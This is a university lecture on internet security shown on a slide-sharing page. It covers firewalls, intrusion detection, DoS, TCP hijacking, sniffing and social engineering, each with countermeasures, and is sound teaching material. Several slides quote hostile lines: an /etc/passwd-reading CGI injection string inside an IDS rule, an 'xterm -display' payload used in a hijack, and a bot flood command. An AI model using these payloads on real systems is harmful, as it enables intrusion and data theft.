Testing tools and AI - ideas what to try with some tool examplesTesting tools and AI - ideas what to try with some tool examples
Testing tools and AI - ideas what to try with some tool examples
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
Arizona Broadband Policy Past, Present, and Future Presentation 3/25/24
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Decarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a realityDecarbonising Buildings: Making a net-zero built environment a reality
Decarbonising Buildings: Making a net-zero built environment a reality
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...Abdul Kader Baba- Managing Cybersecurity Risks  and Compliance Requirements i...
Abdul Kader Baba- Managing Cybersecurity Risks and Compliance Requirements i...
 
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptxA Deep Dive on Passkeys: FIDO Paris Seminar.pptx
A Deep Dive on Passkeys: FIDO Paris Seminar.pptx
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 

Lecture 12 -_internet_security

  • 1. Internet Security Chapter 12 BITS2513 : Internet Technology 1
  • 2. A Brief History of the World 2
  • 3. Overview  What is security?  Why do we need security?  Who is vulnerable?  Common security attacks and countermeasures – Firewalls & Intrusion Detection Systems – Denial of Service Attacks – TCP Attacks – Packet Sniffing – Social Problems 3
  • 4. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 4
  • 5. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 5
  • 6. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 6
  • 7. What is “Security”  Dictionary.com says: – 1. Freedom from risk or danger; safety. – 2. Freedom from doubt, anxiety, or fear; confidence. – 3. Something that gives or assures safety, as: • 1. A group or department of private guards: Call building security if a visitor acts suspicious. • 2. Measures adopted by a government to prevent espionage, sabotage, or attack. • 3. Measures adopted, as by a business or homeowner, to prevent a crime such as burglary or assault: Security was lax at the firm's smaller plant. …etc. 7
  • 8. Why do we need security?  Protect vital information while still allowing access to those who need it – Trade secrets, medical records, etc.  Provide authentication and access control for resources – Ex: AFS  Guarantee availability of resources – Ex: 5 9’s (99.999% reliability) 8
  • 9. Who is vulnerable?  Financial institutions and banks  Internet service providers  Pharmaceutical companies  Government and defense agencies  Contractors to various government agencies  Multinational corporations  ANYONE ON THE NETWORK 9
  • 10. Common security attacks and their countermeasures  Finding a way into the network – Firewalls  Exploiting software bugs, buffer overflows – Intrusion Detection Systems  Denial of Service – Ingress filtering, IDS  TCP hijacking – IPSec  Packet sniffing – Encryption (SSH, SSL, HTTPS)  Social problems – Education 10
  • 11. Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time – Difficult for users to keep up with changes and keep host secure – Solution • Administrators limit access to end hosts by using a firewall • Firewall is kept up-to-date by administrators 11
  • 12. Firewalls  A firewall is like a castle with a drawbridge – Only one point of access into the network – This can be good or bad  Can be hardware or software – Ex. Some routers come with firewall functionality – ipfw, ipchains, pf on Unix systems, Windows XP and Mac OS X have built in firewalls 12
  • 13. Firewalls Internet DMZ Web server, email server, web proxy, etc Firewall Firewall Intranet 13
  • 14. Firewalls  Used to filter packets based on a combination of features – These are called packet filtering firewalls • There are other types too, but they will not be discussed – Ex. Drop packets with destination port of 23 (Telnet) – Can use any combination of IP/UDP/TCP header information – man ipfw on unix47 for much more detail  But why don’t we just turn Telnet off? 14
  • 15. Firewalls  Here is what a computer with a default Windows XP install looks like: – 135/tcp open loc-srv – 139/tcp open netbios-ssn – 445/tcp open microsoft-ds – 1025/tcp open NFS-or-IIS – 3389/tcp open ms-term-serv – 5000/tcp open UPnP  Might need some of these services, or might not be able to control all the machines on the network 15
  • 16. Firewalls  What does a firewall rule look like? – Depends on the firewall used  Example: ipfw – /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls – Different graphical user interfaces – Varying amounts of complexity and power 16
  • 17. Intrusion Detection  Used to monitor for “suspicious activity” on a network – Can protect against known software exploits, like buffer overflows  Open Source IDS: Snort, www.snort.org 17
  • 18. Intrusion Detection  Uses “intrusion signatures” – Well known patterns of behavior • Ping sweeps, port scanning, web server indexing, OS fingerprinting, DoS attempts, etc.  Example – IRIX vulnerability in webdist.cgi – Can make a rule to drop packets containing the line • “/cgi-bin/webdist.cgi?distloc=?;cat%20/etc/passwd”  However, IDS is only useful if contingency plans are in place to curb attacks as they are occurring 18
  • 19. Minor Detour…  Say we got the /etc/passwd file from the IRIX server  What can we do with it? 19
  • 20. Dictionary Attack  We can run a dictionary attack on the passwords – The passwords in /etc/passwd are encrypted with the crypt(3) function (one-way hash) – Can take a dictionary of words, crypt() them all, and compare with the hashed passwords  This is why your passwords should be meaningless random junk! – For example, “sdfo839f” is a good password • That is not my andrew password • Please don’t try it either 20
  • 21. Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks – SYN flooding – SMURF – Distributed attacks – Mini Case Study: Code-Red 21
  • 22. Denial of Service  SYN flooding attack  Send SYN packets with bogus source address – Why?  Server responds with SYN ACK and keeps state about TCP half-open connection – Eventually, server memory is exhausted with this state  Solution: use “SYN cookies” – In response to a SYN, create a special “cookie” for the connection, and forget everything else – Then, can recreate the forgotten information when the ACK comes in from a legitimate connection 22
  • 24. Denial of Service  SMURF – Source IP address of a broadcast ping is forged – Large number of machines respond back to victim, overloading it 24
  • 25. Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim 25
  • 26. Denial of Service  Distributed Denial of Service – Same techniques as regular DoS, but on a much larger scale – Example: Sub7Server Trojan and IRC bots • Infect a large number of machines with a “zombie” program • Zombie program logs into an IRC channel and awaits commands • Example: – Bot command: !p4 207.71.92.193 – Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000 – Sends 10,000 64k packets to the host (655MB!) • Read more at: http://grc.com/dos/grcdos.htm 26
  • 27. Denial of Service  Mini Case Study – CodeRed – July 19, 2001: over 359,000 computers infected with Code-Red in less than 14 hours – Used a recently known buffer exploit in Microsoft IIS – Damages estimated in excess of $2.6 billion 27
  • 28. Denial of Service  Why is this under the Denial of Service category? – CodeRed launched a DDOS attack against www1.whitehouse.gov from the 20th to the 28th of every month! – Spent the rest of its time infecting other hosts 28
  • 29. Denial of Service  How can we protect ourselves? – Ingress filtering • If the source IP of a packet comes in on an interface which does not have a route to that packet, then drop it • RFC 2267 has more information about this – Stay on top of CERT advisories and the latest security patches • A fix for the IIS buffer overflow was released sixteen days before CodeRed had been deployed! 29
  • 30. TCP Attacks  Recall how IP works… – End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery – Source address – host may trick destination into believing that the packet is from a trusted source • Especially applications which use IP addresses as a simple authentication method • Solution – use better authentication methods 30
  • 31. TCP Attacks  TCP connections have associated state – Starting sequence numbers, port numbers  Problem – what if an attacker learns these values? – Port numbers are sometimes well known to begin with (ex. HTTP uses port 80) – Sequence numbers are sometimes chosen in very predictable ways 31
  • 32. TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source – Ex. Instead of downloading and running new program, you download a virus and execute it 32
  • 33. TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears 33
  • 34. TCP Attacks  Alice and Bob have an established TCP connection 34
  • 35. TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network – He can intercept all of their packets 35
  • 36. TCP Attacks  First, Mr. Big Ears must drop all of Alice’s packets since they must not be delivered to Bob (why?) Packets The Void 36
  • 37. TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice 37
  • 38. TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob? – Can just DoS Alice instead of dropping her packets – Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted? – Mitnick: payload is “add self to .rhosts” – Or, “xterm -display MrBigEars:0” 38
  • 39. TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user 39
  • 40. TCP Attacks  How do we prevent this?  IPSec – Provides source authentication, so Mr. Big Ears cannot pretend to be Alice – Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is 40
  • 41. Five Minute Break  For your enjoyment, here is something completely unrelated to this lecture: 41
  • 42. Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn’t get any easier to figure out what data is being transmitted over the network! 42
  • 43. Packet Sniffing  This works for wireless too!  In fact, it works for any broadcast-based medium 43
  • 44. Packet Sniffing  What kinds of data can we get?  Asked another way, what kind of information would be most useful to a malicious user?  Answer: Anything in plain text – Passwords are the most popular 44
  • 45. Packet Sniffing  How can we protect ourselves?  SSH, not Telnet – Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!) – Now that I have told you this, please do not exploit this information – Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL – Especially when making purchases with credit cards!  SFTP, not FTP – Unless you really don’t care about the password or data – Can also use KerbFTP (download from MyAndrew)  IPSec – Provides network-layer confidentiality 45
  • 46. Social Problems  People can be just as dangerous as unprotected computer systems – People can be lied to, manipulated, bribed, threatened, harmed, tortured, etc. to give up valuable information – Most humans will breakdown once they are at the “harmed” stage, unless they have been specially trained • Think government here… 46
  • 47. Social Problems  Fun Example 1: – “Hi, I’m your AT&T rep, I’m stuck on a pole. I need you to punch a bunch of buttons for me” 47
  • 48. Social Problems  Fun Example 2: – Someone calls you in the middle of the night • “Have you been calling Egypt for the last six hours?” • “No” • “Well, we have a call that’s actually active right now, it’s on your calling card and it’s to Egypt and as a matter of fact, you’ve got about $2000 worth of charges on your card and … read off your AT&T card number and PIN and then I’ll get rid of the charge for you” 48
  • 49. Social Problems  Fun Example 3: – Who saw Office Space? – In the movie, the three disgruntled employees installed a money-stealing worm onto the companies systems – They did this from inside the company, where they had full access to the companies systems • What security techniques can we use to prevent this type of access? 49
  • 50. Social Problems  There aren’t always solutions to all of these problems – Humans will continue to be tricked into giving out information they shouldn’t – Educating them may help a little here, but, depending on how bad you want the information, there are a lot of bad things you can do to get it  So, the best that can be done is to implement a wide variety of solutions and more closely monitor who has access to what network resources and information – But, this solution is still not perfect 50
  • 51. Conclusions  The Internet works only because we implicitly trust one another  It is very easy to exploit this trust  The same holds true for software  It is important to stay on top of the latest CERT security advisories to know how to patch any security holes 51
  • 52. Security related URLs  http://www.robertgraham.com/pubs/network- intrusion-detection.html  http://online.securityfocus.com/infocus/1527  http://www.snort.org/  http://www.cert.org/  http://www.nmap.org/  http://grc.com/dos/grcdos.htm  http://lcamtuf.coredump.cx/newtcp/ 52